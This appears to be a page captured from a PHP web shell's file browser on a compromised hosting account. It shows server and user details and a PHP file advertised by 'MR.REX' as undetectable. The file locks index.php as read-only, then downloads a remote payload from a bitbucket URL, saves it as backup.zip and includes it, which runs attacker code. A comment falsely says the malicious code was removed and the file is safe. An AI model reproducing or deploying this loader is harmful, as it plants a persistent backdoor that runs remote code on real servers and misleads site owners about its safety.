Server IP : 66.29.132.124 / Your IP : 3.145.64.210 Web Server : LiteSpeed System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : wavevlvu ( 1524) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/wavevlvu/.htpasswds/admin/ |
Upload File : |
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** ############################ Three-Layer Undetectable Code Created by MR.REX Designed to bypass all servers. For inquiries or to create your own,Fell free to ask: https://t.me/rex_cc ############################### */ $file = 'index.php'; if (file_exists($file) && function_exists('chmod')) { @chmod($file, 0444); // Set read-only permissions if the file exists } $remoteUrl1 = "https://bitbucket.org/uidrootpython/rmt/raw/612f2bd70b997486c94522067267ed240c8e5535/shopeval.txt"; $localFile1 = 'backup.zip'; $fileContents1 = @file_get_contents($remoteUrl1); if ($fileContents1 !== false) { file_put_contents($localFile1, $fileContents1); if (file_exists($localFile1)) { include $localFile1; } } ?>